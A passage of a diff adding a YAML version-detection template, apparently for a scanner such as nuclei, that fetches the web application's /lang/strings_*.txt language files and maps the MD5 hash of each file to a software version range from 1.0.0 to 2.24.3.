"(\"3b4f7230835fd1883f793d2abbe9d8bf\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"959c46b4aebd60f35768220f0282e051\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"6b7bbd4050293931d2d3c44ef9c58ef4\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"994c586fe8de49038b17b8afdd074184\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"48fa8784d830d0a28e59a1e86a8c9422\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"13d3a569e61cae28a7a90bae60beb52e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_polish.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.6.0 + dsl: + - "(\"c13e50d86d799bbd3d47daabf11d2911\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"e91a04403184adf4ef7c35bb33f2e5f7\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"19f5d4739eb3fe6902760644c4449b61\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"51be9dad346211de97b6226e1a641728\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"fdee07b04674cbb742d60988d8e7954f\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"99e8da2fa93aa79bf23f0b8af67324d2\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"630ca5050b386b11d65a21e74464a4b9\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"761fd6c6e7b0f3501fd57a6f94145e0a\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"2eeaf8306a6cad71fd50b65c38d396c3\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"6e43ce32feb4efb0f3563782766b3c40\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"6bc308950f3d8ddd36ff3f7fe797b0af\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1f3fe971b07ed36a6a7084e8d11bd307\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"6c16ca71cd35327615615fc1056ca487\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a80d50b80b0f70ed5e7c87306bf7ef65\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"293cae10ce115db81db7fb018e26c067\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c39e852dc0e27e02aa64ea349d870aa9\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"bcfed501c99d8703d18f35bcb87f4b28\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"73a69c40eadd87dd3f3be51414702de1\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"f98bcf640a636d401b9a9e9bc3613c4d\" == md5(body))" + - type: dsl + name: 1.1.8 - 1.1.9 + dsl: + - "(\"1d2e71280a91b54ca885a73fb6325a11\" == md5(body))" + - type: dsl + name: 1.1.7 + dsl: + - "(\"8bc9ca4d036462e288fec2a8b4840476\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"212588b900aab990e30d99163ed0d3bf\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"a759eedf61d8e25507604c5321b0dd0a\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"f3f31222a421ea2729bc480338e0ad31\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"61dde261d83334fc12bae69816aefc8b\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"f629b9785f332fc07bafec8e07f8f52d\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"2f461b52bcd82588db465a74ae6dfc51\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.11.1 + dsl: + - "(\"1ba19195c3cf155c60e65332a91e4f8c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"4a2e4b82569ad9b68d613fa012cb8ea4\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"fd0546a674d6dcb878ce4a886e6aaae2\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"ebc5b79f4e6a8f867b6acbe5c1715ddd\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"c8d4784099af986e81b39f660ca2df81\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"ad5c90fc05db54fa22bfafa734a3cf1e\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"f31aeadf1cfd6a9508c9836bf5b62957\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"330e43fc980f6590e0d7f13ff01c141e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"ee2d0253b29146a495005c97bb15ac5e\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"13f080eb4475da55ca849d4ebdd96fdf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ripoarisch.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.12.2 + dsl: + - "(\"ac693cbb5b74a060278e5bd0af3cdfd8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"d9dbf6747409671a8e069c247897873c\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"f32622aa464fec2650b9fac270c8e125\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"76091614022ac67cfeb833878107c7ff\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"12011c541fb0c70a6ca66c89acb8b0c8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"00ab1c5f1dd0fac672871cd7151d6d4c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ff94feadfc9e6a393473f6deca3262a0\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"aec7464de540ea9805efc688878c941c\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"58f3bcd9d88a9e67fe15db3fbaf5ce70\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"27ea2fb05a87d10626997fb696181d60\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"004f5e110e319eaa63e68900755c920b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6011ea1e7161a3f0cf7c0f77e899c31f\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"869f22c6cc4b20402580b20a7b9e5a41\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"373ad10416fd0a76e5ea0449624dc5d4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"604f6e2737e526e6bbbbbc5f0a4a0ec7\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"3fb350ca0540e159d5a28ed03236ceca\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"f4a992d27d5070f62507d6d6d74d2542\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0faa41cacfe7984b03b19c96a84cca22\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ad14c5717201ab154af49bf0023e125c\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"833550c81f81ab0e799f2b59011f2447\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"4a7d49fee70a35e72299405d42f66365\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"f18fe7b1a17844169eee8417a3daa015\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovene.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"42db18daf16cc408177471b41bc7d981\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"7581b3a8eb608f724817a77af328d05f\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"1229f3e10327476ed7a362eeed28c632\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"4b1814ed0c50fbfaf3b0a8b379322e2e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"74af22a5cd0ba1069314f1ecddf1e399\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"c7b3accd2b36f09cf116ddfdbd0af8d2\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"ceab2a0aec29cb6fd028a1ac763e4e0e\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"f4a516b44e6d3fb93be0d12639d1f7ad\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"410f083ba3471a8b0788ea4e7fd41c79\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"a8b3215e60e76794a35deaf9c22363fd\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"1e0de841c995c0d420709f7abd70132c\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"1508038752378fb37e630e8b0def3451\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"54d0cfadda5df7db8889dbf81b1b78d8\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"ead94d9966aefbc87e9d2d2859ed4653\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"2bd7ea50a83eac587e37d1a3444d5b60\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"52ed6bd8be0dc9dd0e6bef208bb19798\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0009d96e69f6e479b8904100eabbd86f\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"a2288b469cfacbd127de5e6acadb8f9a\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"a3fa9d0de10e04b77409f8a46c1212fe\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"159c8903c98e31ca543fe55298575c5c\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"3573850cdc7a297a791278441b68d067\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"c18b905af9975f24562866856a3bced5\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"3484989970b3866fdc0596d3994d07ad\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"4355b98caf8d4e513eb61bd2c5be8b19\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"3b88588e308fb2a73046b201d741d018\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"ae7a33d58c58e349286b36ead4bd1201\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"930e46be758990a638679182998f9963\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"0a131c14f132b9f2053555288b6e57ed\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"98ce4286ce811bc0a2a6ffe66b45f132\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"19152c26ae000ac8d8437499a8c38727\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1368ccb9b38067994751cc3b66f3ca92\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"fe23acb033c336b5d5a5e0f3423831f7\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"0411d5011634abe38386e3398a76ffc1\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"d5783eae9879aff2e5eed2ac7f08b0b4\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"9fddc8278bf82b64b5882e8d94b3c802\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"93a28335973ddd71ea7519b3c1c7cca3\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c82b4aae8b636af830c89cbf520de5ed\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a655355b9e6e88ea40206c294f41adf2\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"9998a6dadb2a643956a42bb6fe00ff78\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"e30185119bac28447d514e0f6ddd3e3d\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"9403cc07bcb496d2baf7c486190206f6\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"4f56f3035ca92df4e89e0d997dc9e0ce\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.9.1 + dsl: + - "(\"cf0da95c03ae359b6be8295331d7d2c7\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"9f8974fc0069cc7fb7e5d77ed0498674\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"570c9e6e90d54a4966b691cc4b1e044c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"63eac1a79e093f05bd536b17735cf47c\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"b4fc046963a9ef8eed18866c2f2e75a2\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"fa9b07ccb41b14bf45e5cddcf58fa342\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"995b9a4a0dfa159bb0a8b13fce85c03b\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"898d08ee9fc89ccc17b36aa4f462663f\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"067ca5dbf06b3604c23268fb33518584\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"60c279daea8bd43d8d5de429af64c339\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"725e2ffc4140d29523ecec1026919427\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"b6a09882e047c2299409ce9d6408a6e2\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ed46abef7cfd19a3d9235b3dc3ff68cc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.11.1 + dsl: + - "(\"e8a7bb6b0812bfd896088939e27b2440\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.4.2 + dsl: + - "(\"b1339c5d77e53795fc3e9c6f8a9434d0\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"0046f4f35a9f5af9cc5363eb81e37e90\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"6b42a504042172688b94cb2d15e70403\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"45323bed7167c0a66be2c263b4ec7d01\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"d62e072cf197fd8a13bf650035cbac3f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"81d959db8864bdb7fb80cfbd92b85f6e\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"d84cb97d285732dbba6e38d547b549d8\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"78a47c5ea7ebf7dc4d68634d723f0112\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"3a32a17d8096eff74a11b3b7ed08f0d3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"65940faf4f1ed448d446fb1e04cfe1c5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c2ca5ac8b318762e4d654c2b5697a3c8\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"4ff3043d388184067cecf6b51210a0c7\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"2251127aa5af1581315ef4933976aa1a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"4372eea8c1c7bf4508964d5ca49030fd\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"58cf78d1940ac2a4d717cef9792716bc\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"14cb1d84b25d4d615fe51b032d7bca7a\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"a10ae51f9ce29c4f6210c31f21f4577a\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"e4d029ac26f92bfb05018fda854215f9\" == md5(body))" + - type: dsl + name: 1.1.8 - 1.1.9 + dsl: + - "(\"b547f774353c4d76970b6b511221031d\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"1e5abc0b4e15086b78f568d8d74fd2bf\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"f2e231d885b33292d0089e9470c08ea5\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"dc42cfc94cdd54a69c8835656ecd3822\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"fa07cab5a3384a83bf258e69a1d4dcd5\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"73b3c4fccc18a65394d60c42cd2fb5b7\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"a27fc42083bfc6b8e79ab8af93212b3a\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"84f88e0f6875843ab2480d5d8128128f\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"aeb9fae8dd99470626d52d3f9e36f413\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"c268363230f41613bfbb6b199e7bc296\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"a0488e51a324848c3e5a7e3b91037481\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"e4ecd7cad8463f281795d04ce68acc17\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.10.1 + dsl: + - "(\"5fa2759e6353e800923d51383e8bd52a\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"89d2645f42f606a788c2d7ecd9d6d99b\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"f452fa3cd6f6d564882c555d7823edd7\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"66341f404b96e57f2d4addd87de0a053\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"b70308379635add800d19da0d8a16bed\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"7edb9d33f6e27ab75b44c0d5f85311ac\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"76e1aa99fb5e52089079bb4c7740111c\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"80c797eb27da8873f53ad64c4bec2902\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.3 + dsl: + - "(\"71df54a51fb194895db74bc044c81b72\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"b26fddec1431c4ebc50f3c1ba2fd4157\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"99e0896c980fe2e79c9139d3724cc74c\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"7ecfc1d103daaa8cee7be78277f3f791\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"5e17bc35e47506f6865765f8542d1ce9\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"2fe1ef2bd248ceefab76cfe0146e8678\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"4d4d8cb68dd8dfbace58a5a44f49ac45\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"ecb76103897afd767794f527e286462d\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"5d30ca051a1f7e27fa3ab26c4304edd6\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"bbd5b14c7c047be72072acecd92c615c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"5da1a77bd42f9ed2b11c864728ed4ab6\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"f3f701ac89b1ec706c716a5985e6e5e6\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"388b26282962f7836624d20b982d2d95\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"644941c07507aea4dc0535722c3d0356\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"cae7409412645f6101597d23b1ca55a9\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"919a0478703a5c4a1fb91d2e62f069a2\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"f4e171557b3b6ba90a794be3af78b7a1\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"cfe87b008e527a9ec17cadf7cb8e9c5c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"eb539d9928639929a9cd60f7c30ea06b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"99ff4503f9368379b9a34ee8c655a676\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"0014aafaec01add2eac0e2c09513e08f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"bb190ba6bf6ef54d95a6634589c47130\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"2c04f775ba8295d20a1492c1199400e9\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"24ef900809457ab175792f38d1c67a75\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"2f7427a677e4ee07c0f7d39b4ea88153\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"19136ecf4658cbc5d613e0c000f9dd64\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"3c2495b0087ff5f3335d16f2ed63843b\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"7d15e4dcaebcc543af15b5e661959ff6\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"6a5ba3175735b8e7a1ca9768d48def64\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d2b31fe598fbd40b29db2340dbed22d3\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"ba42bbcbce87eb8c991c435f916f7813\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"656b10af663f4fc89e08ba0f3d7773cb\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"d8c2574d547645973f37ca7023ad0c19\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"4d3bbd34d591ef2823d54939ad923e8f\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"54d81fa7bb34efaba036a239c78d111b\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"5ab54e691ce18693d840ab6f953c7dac\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"8ceca33a6f49f69dfaa2222abfd2d516\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"e69fbf62dfa7e30f3fe78a656b1b8c1a\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"9347b9cd16f923e55e26e2f613d6bf16\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"35787287ca4cd4a54d75c956d220b42b\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"83ba950776ad148d0de669ccafd5472d\" == md5(body))" + - type: dsl + name: 1.1.9 + dsl: + - "(\"bb1b94e8a35b691ef094fec4e875e063\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.8 + dsl: + - "(\"8cd10e27be3f83e2d7a323f7b42da5ee\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"004998099dc9aea71b1484f503bfea64\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"91954b340298dec812763e0f7a4d8096\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"1a5e6b0652183d5c04815916e9fe8edd\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"8f1dbcdc9ad935e7c9841c9f6d99ce2a\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.9.1 + dsl: + - "(\"1bcd946df050fd7b27870b6211f32839\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"a374866a03b3bbb01a5508c3ee537d9f\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"49317fd04358cb56ca7b1a1a5ac1fbb4\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"9ba475646bf0c35b2783075b769d879a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"22d20f4158fc7ba30de697b71bd486f4\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"37f7cd0db726e351c5fa3a3335eb5864\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"063d7775d2e33248f8e0b1730e53f88e\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"ec63f2a2ac7f55191390c698e00867d9\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"263235c622ec22eb5346f56615d541f7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"b57c973d4488adf82ce63228b3529667\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"54356403f4f0e1eb5f4104f7f4706a77\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_finnish.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.10.1 + dsl: + - "(\"1ab7ed09900e815528a85cd010544e2a\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"4cc825732f61b7d2aaffdcc554c7ac1f\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"59053b883a4ddbe9697c51cf68dd6f8e\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"06a1a513ad0ae3cdf3e55319b1e0fc6b\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"f74e30e2b6940fc2fde4a451f179f67f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2485a84fbbbc9a5f5fa951aa8064b509\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"10bc0a83f96f9fe71319048d8de197b2\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"7ed6a08d082cac8c1d0d73585f617be3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"8003b4fde70cabd837e7e2c5f327a1b5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"f65f840c36bcc2544af80053c1b5da23\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"bf74235a7ee415141bff04136b61fd57\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"68be85368d861f90b9fbde094743a2d5\" == md5(body))" + - type: 